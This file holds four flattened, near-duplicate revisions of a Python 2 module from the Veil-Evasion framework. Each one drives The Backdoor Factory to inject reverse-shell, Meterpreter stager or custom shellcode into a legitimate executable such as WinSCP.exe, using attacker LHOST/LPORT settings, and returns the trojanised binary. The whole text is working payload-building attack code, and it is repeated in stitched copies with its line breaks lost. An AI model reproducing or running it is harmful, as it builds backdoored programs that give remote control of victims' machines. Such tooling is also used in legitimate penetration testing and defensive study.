def generate(self): #Because of calling BDF via classes, obsolute paths change if self.required_options["orig_exe"][0] == "WinSCP.exe": self.required_options["orig_exe"][ 0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe" #Make sure the bin is supported self.basicDiscovery() if self.required_options["payload"][0] == "custom": Shellcode = self.shellcode.generate() raw = Shellcode.decode("string_escape") f = open(settings.TEMP_DIR + "shellcode.raw", 'wb') f.write(raw) f.close() print "shellcode", settings.TEMP_DIR + "shellcode.raw" #invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin( FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin( FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" else: shellcodeChoice = "" if self.required_options["payload"][0] == "meter_tcp": shellcodeChoice = "reverse_tcp_stager" elif self.required_options["payload"][ 0] == "meter_https" and self.type == "PE": shellcodeChoice = "meterpreter_reverse_https" elif self.required_options["payload"][0] == "rev_shell": shellcodeChoice = "reverse_shell_tcp" else: print helpers.color( "\n [!] Please enter a valid payload choice.", warning=True) raw_input("\n [>] Press any key to return to the main menu:") return "" # invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin( FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin( FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" print helpers.color("\n[*] Running The Backdoor Factory...") try: #PATCH STUFF try: targetFile.run_this() except SystemExit as e: #I use sys.exits in BDF, so not to leave Veil print "\nBackdoorFactory Error, check options and binary\n" return "" #Because shits fast yo time.sleep(4) # read in the output .exe from /tmp/ f = open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') PayloadCode = f.read() f.close() except IOError: print "\nError during The Backdoor Factory execution\n" raw_input("\n[>] Press any key to return to the main menu:") return "" try: #remove backdoored/ in VEIL root shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored') except Exception as e: #quiet failure pass return PayloadCode
def generate(self): #Because of calling BDF via classes, absolute paths change if self.required_options["orig_exe"][0] == "WinSCP.exe": self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe" #Make sure the bin is supported self.basicDiscovery() if self.required_options["payload"][0] == "custom": Shellcode = self.shellcode.generate() raw = Shellcode.decode("string_escape") with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f: f.write(raw) print "shellcode", settings.TEMP_DIR + "shellcode.raw" #invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw", PATCH_METHOD=self.required_options["PATCH_METHOD"][0]) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" else: shellcodeChoice = self.required_options['payload'][0] # invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0]), PATCH_METHOD=self.required_options["PATCH_METHOD"][0]) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" print helpers.color("\n[*] Running The Backdoor Factory...") #PATCH STUFF try: targetFile.run_this() except: #I use sys.exits in BDF, so not to leave Veil print "\nBackdoorFactory Error, check options and binary\n" raw_input("\n[>] Press any key to return to the main menu:") return "" #Because speed time.sleep(3) try: # read in the output .exe from /tmp/ with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f: PayloadCode = f.read() except IOError: print "\nError during The Backdoor Factory execution\n" raw_input("\n[>] Press any key to return to the main menu:") return "" try: #remove backdoored/ in VEIL root shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored') except: #quiet failure pass return PayloadCode
def generate(self): #Because of calling BDF via classes, absolute paths change if self.required_options["ORIGINAL_EXE"][0] == "WinSCP.exe": self.required_options["ORIGINAL_EXE"][ 0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe" #Make sure the bin is supported self.basicDiscovery() shellcodeChoice = self.required_options['PAYLOAD'][0] #cave_miner_inline #iat_reverse_tcp_inline #iat_reverse_tcp_inline_threaded #iat_reverse_tcp_stager_threaded #iat_user_supplied_shellcode_threaded #meterpreter_reverse_https_threaded #reverse_shell_tcp_inline #reverse_tcp_stager_threaded #user_supplied_shellcode_threaded #if self.type == 'PE': # if not (shellcodeChoice == 'meterpreter_https' and shellcodeChoice == 'meter_https' # and shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp' # and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell' # and shellcodeChoice == 'custom'): # print helpers.color("\n [*] Invalid payload: %s..." % shellcodeChoice, warning=True) # return "" #elif self.type == 'ELF': # if not (shellcodeChoice == 'meterpreter_tcp' and shellcodeChoice == 'meter_tcp' # and shellcodeChoice == 'reverse_shell' and shellcodeChoice == 'rev_shell' # and shellcodeChoice == 'custom'): # print helpers.color("\n[*] Invalid payload: %s..." % shellcodeChoice, warning=True) # return "" #else: # print helpers.color("\n[*] Invalid type: %s..." % self.type, warning=True) # return "" if shellcodeChoice == "custom": Shellcode = self.shellcode.generate(self.required_options) raw = Shellcode.decode("string_escape") with open(settings.TEMP_DIR + "shellcode.raw", 'wb') as f: f.write(raw) print "shellcode", settings.TEMP_DIR + "shellcode.raw" #invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin( FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw", PATCH_METHOD=self.required_options["PATCH_METHOD"][0]) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin( FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" else: # invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin( FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0]), PATCH_METHOD=self.required_options["PATCH_METHOD"][0]) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin( FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" print helpers.color("\n[*] Running The Backdoor Factory...") #PATCH STUFF try: targetFile.run_this() except: #I use sys.exits in BDF, so not to leave Veil print "\nBackdoorFactory Error, check options and binary\n" raw_input("\n[>] Press any key to return to the main menu.") return "" #Because speed time.sleep(3) try: # read in the output .exe from /tmp/ with open(settings.VEIL_EVASION_PATH + "backdoored/payload.exe", 'rb') as f: PayloadCode = f.read() except IOError: print "\nError during The Backdoor Factory execution\n" raw_input("\n[>] Press any key to return to the main menu.") return "" try: #remove backdoored/ in VEIL root shutil.rmtree(settings.VEIL_EVASION_PATH + 'backdoored') except: #quiet failure pass return PayloadCode
def generate(self): #Because of calling BDF via classes, obsolute paths change if self.required_options["orig_exe"][0] == "psinfo.exe": self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/psinfo.exe" #Make sure the bin is supported self.basicDiscovery() if self.required_options["payload"][0] == "custom": Shellcode = self.shellcode.generate() raw = Shellcode.decode("string_escape") f = open(settings.TEMP_DIR + "shellcode.raw", 'wb') f.write(raw) f.close() print "shellcode", settings.TEMP_DIR + "shellcode.raw" #invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw") self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" else: shellcodeChoice = "" if self.required_options["payload"][0] == "meter_tcp": shellcodeChoice = "reverse_tcp_stager" elif self.required_options["payload"][0] == "meter_https" and self.type == "PE": shellcodeChoice = "meterpreter_reverse_https" elif self.required_options["payload"][0] == "rev_shell": shellcodeChoice = "reverse_shell_tcp" else: print helpers.color("\n [!] Please enter a valid payload choice.", warning=True) raw_input("\n [>] Press any key to return to the main menu:") return "" # invoke the class for the associated binary if self.type == 'PE': targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "exe" elif self.type == 'ELF': targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0], PORT=int(self.required_options["LPORT"][0])) self.extension = "" else: print "\nInvalid File or File Type Submitted, try again.\n" return "" print helpers.color("\n[*] Running The Backdoor Factory...") try: #PATCH STUFF try: targetFile.run_this() except SystemExit as e: #I use sys.exits in BDF, so not to leave Veil print "\nBackdoorFactory Error, check options and binary\n" return "" #Because shits fast yo time.sleep(4) # read in the output .exe from /tmp/ f = open(settings.VEIL_EVASION_PATH+"backdoored/payload.exe", 'rb') PayloadCode = f.read() f.close() except IOError: print "\nError during The Backdoor Factory execution\n" raw_input("\n[>] Press any key to return to the main menu:") return "" try: #remove backdoored/ in VEIL root shutil.rmtree(settings.VEIL_EVASION_PATH+'backdoored') except Exception as e: #quiet failure pass return PayloadCode